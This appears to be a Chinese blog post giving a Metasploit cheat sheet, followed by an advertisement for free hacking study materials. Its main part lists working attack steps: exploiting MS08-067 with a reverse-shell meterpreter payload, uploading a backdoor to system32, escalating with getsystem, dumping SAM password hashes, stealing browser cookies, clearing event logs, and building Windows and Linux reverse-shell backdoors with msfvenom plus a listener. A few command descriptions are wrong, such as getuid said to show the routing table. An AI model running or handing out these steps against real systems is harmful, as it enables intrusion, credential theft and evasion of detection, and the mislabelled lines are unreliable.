MSF常用命令(非常详细),零基础入门到精通,看这一篇就够了

前言

msf获取shell


启动 msfconsole
搜索某个模块 search ms08-067
使用某个模块 use exploit/windows/smb/ms08-067_netapi
查看当前模块可以使用的payload[可以省略] show payloads
查看当前模块需要的参数配置 show options[可略]
选择反弹shell的模块 set payload windows/meterpreter/reverse_tcp
设置目标的IP地址 set RHOST 192.168.10.1
设置本地的IP地址 set LHOST 192.168.1.1
设置本地的监听端口 set LPORT 8888
show targets 查看metasploit的渗透攻击模块通常可以列出受到漏洞影响的目标系统类型。
如某些漏洞只适用特定系统的某些版本,这时可以根据目标的操作类型版本来设置版本 set target 1
进行攻击 run/exploit,这样就返回一个meterpreter

meterpreter常用命令


1、background:把meterpreter后台挂起
2、sessions:查看已经成功获取的会话
   sessions -i +num :连接到指定序列号的meterpreter会话继续利用
   sessions -i  2:连接第三个会话主机
3、shell:获取目标主机的远程命令行shell,使用exit退出当前的shell
4、cat:查看目标主机上的文档内容
      cat c:/test.txt
5、getwd:获取系统工作的当前目录
6、upload:上传文件到目标主机
     upload  setup.exe  c:\\windows\\system32\  把后门程序setup.exe上传到目标主机的system32目录下
7、download:把目标主机上的文件下载到我们的攻击主机上
     download  C:\\boot.in  /root/  把目标主机c盘根目录下的boot.ini文件下载到攻击主机的/root/目录下
8、edit:调用vi编辑器,对目标主机的文件进行修改
     edit C:/Windows/System32/drivers/etc/hosts   修改目标主机的hosts文件
9、search: 再目标主机上搜索文件
          search   -d   c:\\  -f *.doc      在目标主机的C盘下搜索doc文档
10、ipconfig/ifconfig:查看目标主机上的网络参数
11、portfwd:端口转发,把目标主机的3389端口转发到其他端口
       portfwd add -l 1122 -p 3389 -r 192.168.10.1
       把目标主机的3389端口转发到192.168.10.1的1122端口,访问192.168.10.1:1122就能打开目标主机的远程桌面
12、route:显示目标主机上的主机路由表
13、getuid:显示目标主机上的主机路由表
14、sysinfo:查看目标主机的系统信息
15、getpid:获取meterpreter会话在 目标主机上的注入进程的进程号
16、migrate:将meterpreter会话进程移植到另外一个进程
    如果我们反弹的meterpreter会话是对方打开了一个预设代码的word文档产生的,如果对方一旦关闭该word文档,我们获取的meterpreter会话就  
    会关闭,所以我们需要把会话进程注入到explorer.exe(桌面进程
    先用ps 查看explorer.exe进程的pid为 xxx,
    然后执行  migrate xxx
17、execute:在目标主机上运行某个程序
           execute -f -i -H cmd.exe  以隐藏的方式运行cmd.exe
18、shutdown:关闭目标主机
19、getsystem:使用该命令提升当前进程的执行账户为system用户, 拿到系统的最高权限
20、hashdump:在获得system权限的情况下,使用hashdump命令可以得到目标的SAM文件,获取目标主机账号密码的hash信息
21、run  post/windows/gather/checkvm
       在meterpreter下run post/windows/gather/checkvm 检测是否为一台虚拟机
22、run post/windows/gather/enum_applications 
       在meterpreter下run post/windows/gather/enum_applications  获取目标主机上的软件安装信息
23、run post/windows/gather/dumplinks
       在meterpreter下run post/windows/gather/dumplinks  获取目标主机最近访问过的文档、链接等信息
24、run post/windows/gather/enum_ie  
       在meterpreter下run post/windows/gather/enum_ie  
       获取到的目标主机上的ie浏览器缓存历史记录和cookies信息等都保存到了攻击主机本地的/root/.msf5/loot/目录下
25、clearev命令:入侵痕迹清除

MSF生成后门


1、生成windows后门:
       msfvenom -p windows/meterpreter/reverse_tcp LHOST=攻击机IP LPORT=攻击端口  -f exe -o /tmp/hack.exe
2、生成linux后门
       msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=攻击ip LPORT=攻击端口  -f elf > shell.elf



use  exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.53
set LPORT 4444
exploit

如何入门学习网络安全

【----帮助网安学习,以下所有学习资料文末免费领取!----】

> ① 网安学习成长路径思维导图
> ② 60+网安经典常用工具包
> ③ 100+SRC漏洞分析报告
> ④ 150+网安攻防实战技术电子书
> ⑤ 最权威CISSP 认证考试指南+题库
> ⑥ 超1800页CTF实战技巧手册
> ⑦ 最新网安大厂面试题合集(含答案)
> ⑧ APP客户端安全检测指南(安卓+IOS)

大纲

首先要找一份详细的大纲。

img

学习教程

第一阶段:零基础入门系列教程

img

该阶段学完即可年薪15w+

第二阶段:技术入门

弱口令与口令爆破
XSS漏洞
CSRF漏洞
SSRF漏洞
XXE漏洞
SQL注入
任意文件操作漏洞
业务逻辑漏洞

该阶段学完年薪25w+

img

阶段三:高阶提升

反序列化漏洞
RCE
综合靶场实操项目
内网渗透
流量分析
日志分析
恶意代码分析
应急响应
实战训练

该阶段学完即可年薪30w+

面试刷题

img

在这里插入图片描述

最后,我其实要给部分人泼冷水,因为说实话,上面讲到的资料包获取没有任何的门槛。

但是,我觉得很多人拿到了却并不会去学习。

大部分人的问题看似是“如何行动”,其实是“无法开始”。

几乎任何一个领域都是这样,所谓“万事开头难”,绝大多数人都卡在第一步,还没开始就自己把自己淘汰出局了。

如果你真的确信自己喜欢网络安全/黑客技术,马上行动起来,比一切都重要

资料领取

上述这份完整版的网络安全学习资料已经上传网盘,朋友们如果需要可以微信扫描下方二维码 即可自动领取↓↓↓
或者

点此链接】领取

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值